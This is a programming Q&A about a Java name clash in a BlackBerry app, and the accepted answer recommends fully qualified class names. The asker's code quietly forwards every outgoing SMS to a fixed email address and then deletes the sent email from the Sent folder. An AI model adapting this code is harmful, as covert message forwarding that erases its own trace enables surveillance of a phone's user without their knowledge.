# Error emailing outgoing sms

Tags: email, blackberry, sms

Is there anyway to listen for an outbound sms without having to import `javax.wireless.messaging`?

I'm trying to write an app that listens for an sms sent from the device then emails the message of the sms, but I get the error:

> reference to Message is ambiguous, both class
>   javax.wireless.messaging.Message in javax.wireless.messaging and class
>   net.rim.blackberry.api.mail.Message in net.rim.blackberry.api.mail
>   match

I need to import `net.rim.blackberry.api.mail.Message` in order to sent an email.

Is there a way to get around this as it seems that the two packages are clashing.

My code:

```java
public void notifyIncomingMessage(MessageConnection messageconnection) {}


public void notifyOutgoingMessage(javax.wireless.messaging.Message message) {

    try {
        String address = message.getAddress();

        String msg = null;

        if ( message instanceof TextMessage ) {
            TextMessage tm = (TextMessage)message;
            msg = tm.getPayloadText();

        } else if (message instanceof BinaryMessage) {
            StringBuffer buf = new StringBuffer();
            byte[] data = ((BinaryMessage) message).getPayloadData();
            msg = new String(data, "UTF-8");

            Store store = Session.getDefaultInstance().getStore();

            Folder[] folders = store.list(Folder.SENT);
            Folder sentfolder = folders[0];

            Message in = new Message(sentfolder);
            Address recipients[] = new Address[1];

            recipients[0]= new Address("me@us.com", "user");

            in.addRecipients(Message.RecipientType.TO, recipients);
            in.setSubject("Outgoing sms");
            in.setContent("You have just sent an sms to: " + address + "\n" + "Message: " + msg);

            in.setPriority(Message.Priority.HIGH);

            Transport.send(in);

            in.setFlag(Message.Flag.OPENED, true);
            Folder folder = in.getFolder();
            folder.deleteMessage(in);               
        }
    } catch (IOException me) {
        System.out.println(me);
    }
}
}
```

Comment: Anyone know how to listen for an outbound sms then email it? Please help

Answer (score 2, accepted):

You never should **need** to `import` anything in Java.  Importing a package is just a shortcut, so that you don't have to fully type out the whole package name.  If you have a class named `Message` that you want to use, and it exists in two packages (both of which you need), then I wouldn't `import` either of them.

Simply, always refer to each of them by their fully-qualified name:

```
net.rim.blackberry.api.mail.Message
```

and

```
javax.wireless.messaging.Message
```

It's just a little more typing.